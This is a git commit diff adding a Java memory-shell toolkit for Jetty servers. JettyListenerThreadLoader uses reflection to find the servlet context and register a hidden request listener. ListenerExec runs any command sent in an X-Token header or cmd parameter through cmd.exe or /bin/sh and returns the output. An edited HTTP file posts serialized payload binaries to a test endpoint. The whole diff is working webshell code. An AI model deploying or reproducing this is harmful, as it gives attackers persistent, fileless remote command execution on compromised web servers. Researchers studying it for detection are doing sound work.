add jetty listener exec & godzilla ms :)

Author: Whoopsunix

JavaClass.http

@@ -13,7 +13,7 @@ cmd=whoami
 # Exec Listener
 POST /base64 HTTP/1.1
 Host: 127.0.0.1:8080
-Xoken: hostname
+X-Token: hostname
 Content-Type: application/x-www-form-urlencoded
 
 
@@ -31,8 +31,8 @@ Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0g
 Content-Disposition: form-data; name="file"; filename="cc4.bin"
 Content-Type: application/octet-stream
 
-#< ./dev/test.bin
-< ./dev/TomcatExecutorThreadLoader.bin
+< ./dev/test.bin
+#< ./dev/TomcatExecutorThreadLoader.bin
 #< ./dev/TomcatListenerThreadMS.bin
 ------WebKitFormBoundary7MA4YWxkTrZu0gW--
 

MemShellAndRceEcho/JavaxJettyDemo/src/main/java/org/example/jetty/memshell/JettyListenerThreadLoader.java

@@ -0,0 +1,198 @@
+package org.example.jetty.memshell;
+
+import java.io.ByteArrayInputStream;
+import java.io.ByteArrayOutputStream;
+import java.io.IOException;
+import java.lang.reflect.Field;
+import java.lang.reflect.InvocationHandler;
+import java.lang.reflect.Method;
+import java.lang.reflect.Proxy;
+import java.util.zip.GZIPInputStream;
+
+/**
+ * @author Whoopsunix
+ * <p>
+ */
+public class JettyListenerThreadLoader {
+    private static String gzipObject;
+    private static String CLASSNAME = "org.example.jetty.memshell.ListenerExec";
+
+    public JettyListenerThreadLoader() {
+    }
+
+    static {
+        try {
+            // 获取 servletContext
+            Object servletContext = getServletContext();
+
+            inject(servletContext);
+
+        } catch (Throwable e) {
+
+        }
+    }
+
+
+//    public static void inject(Object standardContext) throws Exception {
+//    }
+
+    /**
+     * Jetty Listener
+     */
+    public static void inject(Object servletContext) throws Exception {
+        Object[] _eventListeners = (Object[]) getFieldValue(servletContext, "_eventListeners");
+        if (_eventListeners != null) {
+            for (int i = 0; i < _eventListeners.length; i++) {
+                if (_eventListeners[i].getClass().getName().contains(CLASSNAME)) {
+                    return;
+                }
+            }
+        }
+
+
+        // 动态代理兼容 javax jakarta
+        Class listenerClass = null;
+        try {
+            listenerClass = Class.forName("jakarta.servlet.ServletRequestListener");
+        } catch (Exception e) {
+            try {
+                listenerClass = Class.forName("javax.servlet.ServletRequestListener");
+            } catch (ClassNotFoundException ex) {
+
+            }
+        }
+
+//        byte[] bytes = decompress(gzipObject);
+//        ClassLoader classLoader = Thread.currentThread().getContextClassLoader();
+//        Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, Integer.TYPE, Integer.TYPE);
+//        defineClass.setAccessible(true);
+//        Class clazz;
+//        try {
+//            clazz = (Class) defineClass.invoke(classLoader, bytes, 0, bytes.length);
+//        } catch (Exception e) {
+//            clazz = classLoader.loadClass(CLASSNAME);
+//        }
+
+        Class clazz = Class.forName(CLASSNAME);
+        Object javaObject = clazz.newInstance();
+        Object object = Proxy.newProxyInstance(listenerClass.getClassLoader(), new Class[]{listenerClass}, (InvocationHandler) javaObject);
+
+
+        invokeMethod(servletContext.getClass().getSuperclass(), servletContext, "addEventListener", new Class[]{Class.forName("java.util.EventListener")}, new Object[]{object});
+
+
+    }
+
+    public static Object getServletContext() throws Exception {
+        try {
+            Object threadLocals = getFieldValue(Thread.currentThread(), "threadLocals");
+            Object[] table = (Object[]) getFieldValue(threadLocals, "table");
+            for (int i = 0; i < table.length; i++) {
+                Object entry = table[i];
+                if (entry == null)
+                    continue;
+                Object value = getFieldValue(entry, "value");
+                if (value == null)
+                    continue;
+
+//                ServletContextHandler.getCurrentContext()
+                Object context = invokeMethod(Class.forName("org.eclipse.jetty.server.handler.ContextHandler"), value, "getCurrentContext", new Class[]{}, new Object[]{});
+                Object servletContext = getFieldValue(context, "this$0");
+
+                return servletContext;
+
+                // todo 测试版本覆盖 以下为 rceecho 相关类
+                // Jetty 7 低版本 org.eclipse.jetty.server.nio.SelectChannelConnector
+                // Jetty 7 8  org.eclipse.jetty.server.AsyncHttpConnection
+                // Jetty 9、10  org.eclipse.jetty.server.HttpConnection
+            }
+        } catch (Exception e) {
+
+        }
+
+
+        return null;
+    }
+
+    public static Object getObject() throws Exception {
+        // 动态代理兼容 javax jakarta
+        Class listenerClass = null;
+        try {
+            listenerClass = Class.forName("jakarta.servlet.ServletRequestListener");
+        } catch (Exception e) {
+            try {
+                listenerClass = Class.forName("javax.servlet.ServletRequestListener");
+            } catch (ClassNotFoundException ex) {
+
+            }
+        }
+
+//        byte[] bytes = decompress(gzipObject);
+//        ClassLoader classLoader = Thread.currentThread().getContextClassLoader();
+//        Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, Integer.TYPE, Integer.TYPE);
+//        defineClass.setAccessible(true);
+//        Class clazz;
+//        try {
+//            clazz = (Class) defineClass.invoke(classLoader, bytes, 0, bytes.length);
+//        } catch (Exception e) {
+//            clazz = classLoader.loadClass(CLASSNAME);
+//        }
+
+        Class clazz = Class.forName(CLASSNAME);
+        Object javaObject = clazz.newInstance();
+        Object object = Proxy.newProxyInstance(listenerClass.getClassLoader(), new Class[]{listenerClass}, (InvocationHandler) javaObject);
+
+        return object;
+    }
+
+
+    // tools
+    public static byte[] decompress(String gzipObject) throws IOException {
+        final byte[] compressedData = new sun.misc.BASE64Decoder().decodeBuffer(gzipObject);
+        ByteArrayInputStream bais = new ByteArrayInputStream(compressedData);
+        try {
+            GZIPInputStream gzipInputStream = new GZIPInputStream(bais);
+            ByteArrayOutputStream baos = new ByteArrayOutputStream();
+            byte[] buffer = new byte[1024];
+            int len;
+            while ((len = gzipInputStream.read(buffer)) > 0) {
+                baos.write(buffer, 0, len);
+            }
+            return baos.toByteArray();
+        } catch (Exception e) {
+
+        }
+        return null;
+    }
+
+    public static Object getFieldValue(final Object obj, final String fieldName) throws Exception {
+        final Field field = getField(obj.getClass(), fieldName);
+        return field.get(obj);
+    }
+
+    public static Field getField(final Class<?> clazz, final String fieldName) {
+        Field field = null;
+        try {
+            field = clazz.getDeclaredField(fieldName);
+            field.setAccessible(true);
+        } catch (NoSuchFieldException ex) {
+            if (clazz.getSuperclass() != null)
+                field = getField(clazz.getSuperclass(), fieldName);
+        }
+        return field;
+    }
+
+    public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
+        final Field field = getField(obj.getClass(), fieldName);
+        field.set(obj, value);
+    }
+
+    public static Object invokeMethod(Class cls, Object obj, String methodName, Class[] argsClass, Object[] args) throws Exception {
+        Method method = cls.getDeclaredMethod(methodName, argsClass);
+        method.setAccessible(true);
+        Object object = method.invoke(obj, args);
+        return object;
+    }
+
+
+}

MemShellAndRceEcho/JavaxJettyDemo/src/main/java/org/example/jetty/memshell/ListenerExec.java

@@ -0,0 +1,112 @@
+package org.example.jetty.memshell;
+
+import java.io.InputStream;
+import java.lang.reflect.Field;
+import java.lang.reflect.InvocationHandler;
+import java.lang.reflect.Method;
+
+/**
+ * @author Whoopsunix
+ *
+ */
+public class ListenerExec implements InvocationHandler {
+    private static String HEADER = "X-Token";
+    private static String PARAM = "cmd";
+
+    public Object invoke(Object proxy, Method method, Object[] args) {
+        if (method.getName().equals("requestInitialized")) {
+            run(args[0]);
+        }
+        return null;
+    }
+
+//    public Object getResponse(Object httpServletRequest) throws Exception {
+//        return null;
+//    }
+//
+//    private void run(Object sre) {
+//    }
+
+    /**
+     * Jetty
+     */
+    public Object getResponse(Object httpServletRequest) throws Exception{
+        Object channel = getFieldValue(httpServletRequest, "_channel");
+        return getFieldValue(channel, "_response");
+    }
+    private void run(Object sre) {
+        try {
+            Object httpServletRequest = invokeMethod(sre, "getServletRequest", new Class[]{}, new Object[]{});
+            Object header =  invokeMethod(httpServletRequest, "getHeader", new Class[]{String.class}, new Object[]{HEADER});
+            Object param = invokeMethod(httpServletRequest, "getParameter", new Class[]{String.class}, new Object[]{PARAM});
+            String str = null;
+            if (header != null) {
+                str = (String) header;
+            } else if (param != null) {
+                str = (String) param;
+            }
+            String result = exec(str);
+            Object response = getResponse(httpServletRequest);
+            invokeMethod(response, "setStatus", new Class[]{Integer.TYPE}, new Object[]{new Integer(200)});
+            Object writer = invokeMethod(response, "getWriter", new Class[]{}, new Object[]{});
+            invokeMethod(writer, "println", new Class[]{String.class}, new Object[]{result});
+        } catch (Exception ignored) {
+        }
+    }
+    public static String exec(String str) throws Exception {
+        String[] cmd;
+        if (System.getProperty("os.name").toLowerCase().contains("win")) {
+            cmd = new String[]{"cmd.exe", "/c", str};
+        } else {
+            cmd = new String[]{"/bin/sh", "-c", str};
+        }
+        InputStream inputStream = Runtime.getRuntime().exec(cmd).getInputStream();
+        return exec_result(inputStream);
+    }
+
+    public static String exec_result(InputStream inputStream) throws Exception {
+        byte[] bytes = new byte[1024];
+        int len;
+        StringBuilder stringBuilder = new StringBuilder();
+        while ((len = inputStream.read(bytes)) != -1) {
+            stringBuilder.append(new String(bytes, 0, len));
+        }
+        return stringBuilder.toString();
+    }
+
+    public static Object getFieldValue(final Object obj, final String fieldName) throws Exception {
+        final Field field = getField(obj.getClass(), fieldName);
+        return field.get(obj);
+    }
+
+    public static Field getField(final Class<?> clazz, final String fieldName) {
+        Field field = null;
+        try {
+            field = clazz.getDeclaredField(fieldName);
+            field.setAccessible(true);
+        } catch (NoSuchFieldException ex) {
+            if (clazz.getSuperclass() != null)
+                field = getField(clazz.getSuperclass(), fieldName);
+        }
+        return field;
+    }
+
+    public static Object invokeMethod(Object obj, String methodName, Class[] argsClass, Object[] args) throws Exception {
+        Method method;
+        try {
+            method = obj.getClass().getDeclaredMethod(methodName, argsClass);
+        } catch (NoSuchMethodException e) {
+            method = obj.getClass().getSuperclass().getDeclaredMethod(methodName, argsClass);
+        }
+        method.setAccessible(true);
+        return method.invoke(obj, args);
+    }
+
+//    public static String getHEADER() {
+//        return HEADER;
+//    }
+//
+//    public static String getPARAM() {
+//        return PARAM;
+//    }
+}